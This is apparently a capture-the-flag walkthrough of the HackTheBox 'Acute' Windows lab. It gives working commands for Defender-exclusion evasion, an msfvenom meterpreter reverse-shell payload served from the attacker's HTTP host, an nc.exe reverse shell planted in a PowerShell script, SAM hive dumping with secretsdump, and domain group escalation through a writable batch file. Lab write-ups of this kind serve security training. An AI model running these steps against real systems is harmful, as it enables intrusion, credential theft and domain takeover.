Skip to content

Latest commit

 

History

History
273 lines (146 loc) · 6.61 KB

README.md

File metadata and controls

273 lines (146 loc) · 6.61 KB
Raw

Acute

nmap -p- --min-rate 10000 10.10.11.145 -Pn

Alt text

After detection of one port (443), let's do greater nmap scan.

nmap -A -sC -sV -p443 10.10.11.145

Alt text

From this image, I add 'atsserver.acute.local' and 'acute.local' into my '/etc/hosts' file

We have a web application for 'atsserver.acute.local'.

Alt text

From response headers, I see that 'X-Powered-By' value is 'ASP.NET', let's search directories.

feroxbuster -u https://atsserver.acute.local/ -x aspx -k -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

Alt text

I found .docx file which gives default password, also there is remote training is possible means (RDP is enabled for some server)

Alt text

I got usernames from possible name and surnames for below image.

Alt text

Link for remote access.

I also do exiftool for .docx file, which shows computer name 'Acute-PC01'.

Possible usernames like below for one password 'Password1!'.

awallace
chall
edavies
imonks
jmorgan
lhopkins

Alt text

I got Powershell.

Alt text

I tried to upload malicious executable, but it doesn't work as because of 'Windows Defender'.

I search Exclusions directories for 'Windows Defender' via below reg query command.

reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"

Alt text

Let's upload malicious executable into 'C:\Utils' directory.

1.First, let's create malicious executable via msfvenom command.

msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=1337 LHOST=10.10.16.6 -f exe -o dr4ks.exe

Alt text

2.Let's open HTTP serve to serve this malicious executable.

python3 -m http.server --bind 10.10.16.6 8080

Alt text

3.Then, download this via wget command. (on C:\Utils)

wget http://10.10.16.6:8080/dr4ks.exe -outfile dr4ks.exe

Alt text

While executing this malicious 'dr4ks.exe' file, I got reverse shell from port (1337).

Alt text

I see live RDP sessions via qwinsta command.

qwinsta /server:127.0.0.1

Alt text

While I doing screenshare command on meterpreter shell, it gives live screen recording to me.

Alt text

I copied all commands from screen mirroring.

$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlaintext -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $pass)
Enter-PSSession -computername ATSSERVER -ConfigurationName dc_manage -credential $cred

Alt text

I check that my credentials worked or not via below command.

Invoke-Command -ScriptBlock { whoami } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

Alt text

I can read user.txt file via typing a lot of commands using this session.

Invoke-Command -ScriptBlock { cat C:\users\imonks\desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

user.txt

Alt text

I found a file which have sensitive credentials called 'wm.ps1'

Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

Alt text

I knwo that this 'jmorgan' user is group of 'Administrators' net localgroup Administrators.

Alt text

Now, I replace this wm.ps1 command via my reverse shell, but my nc.exe binary should be in 'C:\Utils' directory.

Invoke-Command -ScriptBlock { ((cat ..\desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc.exe -e cmd 10.10.16.6 1338') | sc -Path ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

Yes, I read that my reverse shell script block is located or not via below command.

Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

Alt text

Let's run this powershell script via below cmdlet.

Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

I got reverse shell from port (1338).

Alt text

As this user belongs to 'Administrators' localgroup, can easily dump 'SAM' and 'SYSTEM' files.

reg save HKLM\sam sam.bak
reg save HKLM\system sys.bak

Alt text

I download two files from meterpreter shell.

Alt text

Now, to dump SAM database, I need to use secretsdump.py script of Impacket module.

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.bak -system sys.bak LOCAL

Alt text

I crack the password of 'Administrator' user via Crackstation.

Alt text

I use this password for 'awallace' user.

$pass = ConvertTo-SecureString "Password@123" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $pass)
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }

Alt text

I found a script which this user have permission '\program files\keepmeon'. which is .bat file, If I add reverse shell into it, I can be Administrator.

I looked at Domain Admins via net group /domain.

Alt text

I looked at specific one called 'Site_Admin'.

Alt text

I will use .bat script to add my user into this 'Site_Admin' group via below command.

Invoke-Command -ScriptBlock { Set-Content -Path '\program files\keepmeon\0xdf.bat' -Value 'net group site_admin awallace /add /domain'} -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

Invoke-Command -ScriptBlock { cat '\program files\keepmeon\0xdf.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred  #check that previous command added or not

Alt text

Now, I can read root.txt via below command.

Invoke-Command -ScriptBlock { cat \users\administrator\desktop\root.txt  } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

root.txt

Alt text